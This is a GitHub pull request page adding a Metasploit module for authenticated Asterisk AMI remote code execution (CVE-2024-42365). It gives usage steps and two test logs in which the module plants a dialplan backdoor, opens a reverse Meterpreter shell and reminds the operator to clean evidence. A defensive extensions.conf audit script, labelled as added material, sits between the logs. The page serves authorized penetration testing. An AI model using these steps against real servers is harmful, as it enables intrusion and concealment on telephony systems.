
Asterisk authenticated rce via AMI (CVE-2024-42365) #19613

Open
wants to merge 5 commits into
base: master

Conversation


@h00die h00die commented Nov 1, 2024

Fixes #19388

Authenticated RCE for Asterisk via AMI for users with originate access, CVE-2024-42365. Hats off to @bcoles for writing a bunch of the underlying functionality which I'm going to move into a lib. Exploit works with certain payloads, needs a cleanup and some more robustness.

  • Install the application
  • Start msfconsole
  • Do: use exploit/linux/misc/asterisk_ami_originate_auth_rce
  • Do: set rhosts <rhost>
  • Do: set lhost <lhost>
  • Do: set username <username>
  • Do: set password <password>
  • You should get a shell.


@h00die h00die left a comment


will wait for full review to implement these changes

@h00die h00die changed the title WIP for asterisk rce (CVE-2024-42365) Asterisk authenticated rce via AMI (CVE-2024-42365) Nov 4, 2024
@h00die h00die marked this pull request as ready for review November 4, 2024 21:32

h00die commented Nov 11, 2024

Everything else should be addressed!

@jheysel-r7 jheysel-r7 self-assigned this Nov 28, 2024

@jheysel-r7 jheysel-r7 left a comment


Thanks for the module @h00die. Looks good, just few minor comments. Testing was as expected:

msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set username testuser
username => testuser
smsf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set password testuser
password => testuser
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set verbose true
verbose => true
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.243:5038 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.243:5038 - Connecting...
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[*] 192.168.123.243:5038 - Authenticating as 'testuser'
[!] 192.168.123.243:5038 - No active DB -- Credential data will not be saved!
[+] 192.168.123.243:5038 - Authenticated successfully
[*] 192.168.123.243:5038 - Checking Asterisk version
[!] 192.168.123.243:5038 - The service is running, but could not be validated. Able to connect, unable to determine version
[*] 192.168.123.243:5038 - Connecting...
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[*] 192.168.123.243:5038 - Authenticating as 'testuser'
[+] 192.168.123.243:5038 - Authenticated successfully
[*] 192.168.123.243:5038 - Using new context name: VTRmMAvWcc
[*] 192.168.123.243:5038 - Loading conf file
[+] 192.168.123.243:5038 -   Response: Success, Message: Originate successfully queued
[*] 192.168.123.243:5038 - Setting backdoor
[+] 192.168.123.243:5038 -   Response: Success, Message: Originate successfully queued
[*] 192.168.123.243:5038 - Reloading config
[+] 192.168.123.243:5038 -   Response: Success, Message: Originate successfully queued
[*] 192.168.123.243:5038 - Triggering shellcode
[*] Sending stage (24772 bytes) to 192.168.123.243
[+] 192.168.123.243:5038 - !!!Don't forget to clean evidence from /etc/asterisk/extensions.conf!!!
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.243:40994) at 2024-11-28 10:02:39 -0800

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer        : freepbx.sangoma.local
OS              : Linux 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit


h00die commented Nov 29, 2024

Just tested w/ all changes, still working just fine :)

@jheysel-r7

Thanks for making those changes! I also just retested and everything was working perfectly :) Landing now

msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set rhost 192.168.123.243
rhost => 192.168.123.243
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set username testuser
username => testuser
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set password testuser
password => testuser
rmsf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.243:5038 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[+] 192.168.123.243:5038 - Authenticated successfully
[!] 192.168.123.243:5038 - The service is running, but could not be validated. Able to connect, unable to determine version
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[+] 192.168.123.243:5038 - Authenticated successfully
[*] 192.168.123.243:5038 - Using new context name: MiCAmsEvkFU
[*] 192.168.123.243:5038 - Loading conf file
[*] 192.168.123.243:5038 - Setting backdoor
[*] 192.168.123.243:5038 - Reloading config
[*] 192.168.123.243:5038 - Triggering shellcode
[*] Sending stage (24772 bytes) to 192.168.123.243
[+] 192.168.123.243:5038 - !!!Don't forget to clean evidence from /etc/asterisk/extensions.conf!!!
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.243:49454) at 2024-11-29 09:19:54 -0800

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer        : freepbx.sangoma.local
OS              : Linux 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
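Both test transcripts show the module writing a random-named context into /etc/asterisk/extensions.conf ("Using new context name", "Setting backdoor", "Reloading config") and then warning the operator to clean that file, so a defender's first check is whether extensions.conf contains contexts outside a known baseline. The script below is an added example, not code from this PR or from the Metasploit module: it parses extensions.conf, reports contexts missing from a baseline set, and flags extension lines that call shell-capable dialplan applications (System and TrySystem, assumed here to be the applications worth flagging). The sample configuration, the baseline set and the context name are constructed.

```python
import re

# Dialplan applications that pass their argument to a shell. Assumption: this
# list is the example's own choice of what to flag, not taken from the module.
SHELL_APPS = {"system", "trysystem"}

# Constructed sample of /etc/asterisk/extensions.conf: one legitimate context
# plus a random-named context like the ones reported in the PR transcripts.
SAMPLE_CONF = """
[general]
static=yes

[from-internal]
exten => 100,1,Dial(PJSIP/100)
exten => 100,n,Hangup()

[VTRmMAvWcc]
exten => s,1,System(/usr/bin/logger constructed-sample)
exten => s,n,Hangup()
"""

# Matches "exten => ext,prio,App(" and "same => prio,App(" and captures App.
APP_CALL = re.compile(r"^(?:exten|same)\s*=>\s*(?:[^,]+,){1,2}(\w+)\(")


def parse_contexts(conf_text):
    """Return {context_name: [non-comment lines]} from extensions.conf text."""
    contexts, current = {}, None
    for raw in conf_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # strip ';' comments (simplified)
        if not line:
            continue
        header = re.match(r"^\[([^\]]+)\]", line)
        if header:
            current = header.group(1)
            contexts.setdefault(current, [])
        elif current is not None:
            contexts[current].append(line)
    return contexts


def audit(conf_text, expected_contexts):
    """Report contexts absent from the baseline and any shell-capable app use."""
    findings = []
    for name, lines in parse_contexts(conf_text).items():
        if name not in expected_contexts:
            findings.append(f"unexpected context [{name}]")
        for line in lines:
            call = APP_CALL.match(line)
            if call and call.group(1).lower() in SHELL_APPS:
                findings.append(f"[{name}] shell-capable application: {line}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF, {"general", "from-internal"}):
        print(finding)
```

Run it against a copy of the live file with the baseline taken from a known-good backup; an unexpected context that also calls System() is the pattern the transcripts above leave behind.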

Successfully merging this pull request may close these issues.

Asterisk RCE over AMI (CVE-2024-42365)